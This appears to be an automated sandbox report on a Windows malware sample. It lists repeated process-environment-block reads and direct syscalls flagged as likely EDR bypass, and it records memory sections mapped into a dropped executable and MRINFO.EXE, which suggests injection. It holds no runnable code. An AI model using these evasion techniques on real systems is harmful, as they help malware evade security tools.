Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC2835 mov eax, dword ptr fs:[00000030h]	0_2_00EC2835
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC2835 mov eax, dword ptr fs:[00000030h]	0_2_00EC2835
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDA830 mov eax, dword ptr fs:[00000030h]	0_2_00EDA830
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F2C810 mov eax, dword ptr fs:[00000030h]	0_2_00F2C810
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F2E9E0 mov eax, dword ptr fs:[00000030h]	0_2_00F2E9E0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED29F9 mov eax, dword ptr fs:[00000030h]	0_2_00ED29F9
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED29F9 mov eax, dword ptr fs:[00000030h]	0_2_00ED29F9
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F6A9D3 mov eax, dword ptr fs:[00000030h]	0_2_00F6A9D3
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F369C0 mov eax, dword ptr fs:[00000030h]	0_2_00F369C0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAA9D0 mov eax, dword ptr fs:[00000030h]	0_2_00EAA9D0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAA9D0 mov eax, dword ptr fs:[00000030h]	0_2_00EAA9D0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAA9D0 mov eax, dword ptr fs:[00000030h]	0_2_00EAA9D0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAA9D0 mov eax, dword ptr fs:[00000030h]	0_2_00EAA9D0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAA9D0 mov eax, dword ptr fs:[00000030h]	0_2_00EAA9D0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAA9D0 mov eax, dword ptr fs:[00000030h]	0_2_00EAA9D0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED49D0 mov eax, dword ptr fs:[00000030h]	0_2_00ED49D0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F289B3 mov esi, dword ptr fs:[00000030h]	0_2_00F289B3
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F289B3 mov eax, dword ptr fs:[00000030h]	0_2_00F289B3
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F289B3 mov eax, dword ptr fs:[00000030h]	0_2_00F289B3
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA09AD mov eax, dword ptr fs:[00000030h]	0_2_00EA09AD
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA09AD mov eax, dword ptr fs:[00000030h]	0_2_00EA09AD
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]	0_2_00EB29A0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]	0_2_00EB29A0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]	0_2_00EB29A0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]	0_2_00EB29A0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]	0_2_00EB29A0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]	0_2_00EB29A0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]	0_2_00EB29A0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]	0_2_00EB29A0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]	0_2_00EB29A0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]	0_2_00EB29A0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]	0_2_00EB29A0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]	0_2_00EB29A0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]	0_2_00EB29A0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE096E mov eax, dword ptr fs:[00000030h]	0_2_00EE096E
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE096E mov edx, dword ptr fs:[00000030h]	0_2_00EE096E
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE096E mov eax, dword ptr fs:[00000030h]	0_2_00EE096E
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F44978 mov eax, dword ptr fs:[00000030h]	0_2_00F44978
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F44978 mov eax, dword ptr fs:[00000030h]	0_2_00F44978
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC6962 mov eax, dword ptr fs:[00000030h]	0_2_00EC6962
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC6962 mov eax, dword ptr fs:[00000030h]	0_2_00EC6962
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC6962 mov eax, dword ptr fs:[00000030h]	0_2_00EC6962
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F2C97C mov eax, dword ptr fs:[00000030h]	0_2_00F2C97C
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F20946 mov eax, dword ptr fs:[00000030h]	0_2_00F20946
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F2892A mov eax, dword ptr fs:[00000030h]	0_2_00F2892A
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F3892B mov eax, dword ptr fs:[00000030h]	0_2_00F3892B
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F2C912 mov eax, dword ptr fs:[00000030h]	0_2_00F2C912
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E98918 mov eax, dword ptr fs:[00000030h]	0_2_00E98918
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E98918 mov eax, dword ptr fs:[00000030h]	0_2_00E98918
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F1E908 mov eax, dword ptr fs:[00000030h]	0_2_00F1E908
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F1E908 mov eax, dword ptr fs:[00000030h]	0_2_00F1E908
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDAAEE mov eax, dword ptr fs:[00000030h]	0_2_00EDAAEE
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDAAEE mov eax, dword ptr fs:[00000030h]	0_2_00EDAAEE
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EF6ACC mov eax, dword ptr fs:[00000030h]	0_2_00EF6ACC
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EF6ACC mov eax, dword ptr fs:[00000030h]	0_2_00EF6ACC
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EF6ACC mov eax, dword ptr fs:[00000030h]	0_2_00EF6ACC
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA0AD0 mov eax, dword ptr fs:[00000030h]	0_2_00EA0AD0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED4AD0 mov eax, dword ptr fs:[00000030h]	0_2_00ED4AD0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED4AD0 mov eax, dword ptr fs:[00000030h]	0_2_00ED4AD0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA8AA0 mov eax, dword ptr fs:[00000030h]	0_2_00EA8AA0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA8AA0 mov eax, dword ptr fs:[00000030h]	0_2_00EA8AA0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EF6AA4 mov eax, dword ptr fs:[00000030h]	0_2_00EF6AA4
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAEA80 mov eax, dword ptr fs:[00000030h]	0_2_00EAEA80
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAEA80 mov eax, dword ptr fs:[00000030h]	0_2_00EAEA80
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAEA80 mov eax, dword ptr fs:[00000030h]	0_2_00EAEA80
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAEA80 mov eax, dword ptr fs:[00000030h]	0_2_00EAEA80
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAEA80 mov eax, dword ptr fs:[00000030h]	0_2_00EAEA80
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAEA80 mov eax, dword ptr fs:[00000030h]	0_2_00EAEA80
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAEA80 mov eax, dword ptr fs:[00000030h]	0_2_00EAEA80
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAEA80 mov eax, dword ptr fs:[00000030h]	0_2_00EAEA80
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAEA80 mov eax, dword ptr fs:[00000030h]	0_2_00EAEA80
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F74A80 mov eax, dword ptr fs:[00000030h]	0_2_00F74A80
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED8A90 mov edx, dword ptr fs:[00000030h]	0_2_00ED8A90
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDCA6F mov eax, dword ptr fs:[00000030h]	0_2_00EDCA6F
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDCA6F mov eax, dword ptr fs:[00000030h]	0_2_00EDCA6F
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDCA6F mov eax, dword ptr fs:[00000030h]	0_2_00EDCA6F
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F1CA72 mov eax, dword ptr fs:[00000030h]	0_2_00F1CA72
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F1CA72 mov eax, dword ptr fs:[00000030h]	0_2_00F1CA72
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4EA60 mov eax, dword ptr fs:[00000030h]	0_2_00F4EA60
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0A5B mov eax, dword ptr fs:[00000030h]	0_2_00EB0A5B
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0A5B mov eax, dword ptr fs:[00000030h]	0_2_00EB0A5B
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA6A50 mov eax, dword ptr fs:[00000030h]	0_2_00EA6A50
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA6A50 mov eax, dword ptr fs:[00000030h]	0_2_00EA6A50
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA6A50 mov eax, dword ptr fs:[00000030h]	0_2_00EA6A50
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA6A50 mov eax, dword ptr fs:[00000030h]	0_2_00EA6A50
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA6A50 mov eax, dword ptr fs:[00000030h]	0_2_00EA6A50
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA6A50 mov eax, dword ptr fs:[00000030h]	0_2_00EA6A50
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA6A50 mov eax, dword ptr fs:[00000030h]	0_2_00EA6A50
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECEA2E mov eax, dword ptr fs:[00000030h]	0_2_00ECEA2E
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDCA24 mov eax, dword ptr fs:[00000030h]	0_2_00EDCA24
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC4A35 mov eax, dword ptr fs:[00000030h]	0_2_00EC4A35
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC4A35 mov eax, dword ptr fs:[00000030h]	0_2_00EC4A35
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F2CA11 mov eax, dword ptr fs:[00000030h]	0_2_00F2CA11
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F2CBF0 mov eax, dword ptr fs:[00000030h]	0_2_00F2CBF0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECEBFC mov eax, dword ptr fs:[00000030h]	0_2_00ECEBFC
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA8BF0 mov eax, dword ptr fs:[00000030h]	0_2_00EA8BF0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA8BF0 mov eax, dword ptr fs:[00000030h]	0_2_00EA8BF0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA8BF0 mov eax, dword ptr fs:[00000030h]	0_2_00EA8BF0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4EBD0 mov eax, dword ptr fs:[00000030h]	0_2_00F4EBD0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC0BCB mov eax, dword ptr fs:[00000030h]	0_2_00EC0BCB
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC0BCB mov eax, dword ptr fs:[00000030h]	0_2_00EC0BCB
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC0BCB mov eax, dword ptr fs:[00000030h]	0_2_00EC0BCB
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA0BCD mov eax, dword ptr fs:[00000030h]	0_2_00EA0BCD
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA0BCD mov eax, dword ptr fs:[00000030h]	0_2_00EA0BCD
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA0BCD mov eax, dword ptr fs:[00000030h]	0_2_00EA0BCD
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F54BB0 mov eax, dword ptr fs:[00000030h]	0_2_00F54BB0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F54BB0 mov eax, dword ptr fs:[00000030h]	0_2_00F54BB0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0BBE mov eax, dword ptr fs:[00000030h]	0_2_00EB0BBE
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0BBE mov eax, dword ptr fs:[00000030h]	0_2_00EB0BBE
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E9CB7E mov eax, dword ptr fs:[00000030h]	0_2_00E9CB7E
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4EB50 mov eax, dword ptr fs:[00000030h]	0_2_00F4EB50
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F36B40 mov eax, dword ptr fs:[00000030h]	0_2_00F36B40
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F36B40 mov eax, dword ptr fs:[00000030h]	0_2_00F36B40
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F6AB40 mov eax, dword ptr fs:[00000030h]	0_2_00F6AB40
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F48B42 mov eax, dword ptr fs:[00000030h]	0_2_00F48B42
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F54B4B mov eax, dword ptr fs:[00000030h]	0_2_00F54B4B
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F54B4B mov eax, dword ptr fs:[00000030h]	0_2_00F54B4B
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECEB20 mov eax, dword ptr fs:[00000030h]	0_2_00ECEB20
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECEB20 mov eax, dword ptr fs:[00000030h]	0_2_00ECEB20
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F68B28 mov eax, dword ptr fs:[00000030h]	0_2_00F68B28
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F68B28 mov eax, dword ptr fs:[00000030h]	0_2_00F68B28
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F1EB1D mov eax, dword ptr fs:[00000030h]	0_2_00F1EB1D
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F1EB1D mov eax, dword ptr fs:[00000030h]	0_2_00F1EB1D
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F1EB1D mov eax, dword ptr fs:[00000030h]	0_2_00F1EB1D
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F1EB1D mov eax, dword ptr fs:[00000030h]	0_2_00F1EB1D
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F1EB1D mov eax, dword ptr fs:[00000030h]	0_2_00F1EB1D
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F1EB1D mov eax, dword ptr fs:[00000030h]	0_2_00F1EB1D
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F1EB1D mov eax, dword ptr fs:[00000030h]	0_2_00F1EB1D
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F1EB1D mov eax, dword ptr fs:[00000030h]	0_2_00F1EB1D
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F1EB1D mov eax, dword ptr fs:[00000030h]	0_2_00F1EB1D
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED2CF0 mov eax, dword ptr fs:[00000030h]	0_2_00ED2CF0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED2CF0 mov eax, dword ptr fs:[00000030h]	0_2_00ED2CF0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED2CF0 mov eax, dword ptr fs:[00000030h]	0_2_00ED2CF0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED2CF0 mov eax, dword ptr fs:[00000030h]	0_2_00ED2CF0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E9CCC8 mov eax, dword ptr fs:[00000030h]	0_2_00E9CCC8
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F50CB5 mov eax, dword ptr fs:[00000030h]	0_2_00F50CB5
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F50CB5 mov eax, dword ptr fs:[00000030h]	0_2_00F50CB5
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F50CB5 mov eax, dword ptr fs:[00000030h]	0_2_00F50CB5
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F50CB5 mov eax, dword ptr fs:[00000030h]	0_2_00F50CB5

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Section loaded: NULL target: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Section loaded: NULL target: C:\Windows\SysWOW64\MRINFO.EXE protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: NULL target: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe protection: read write	Jump to behavior
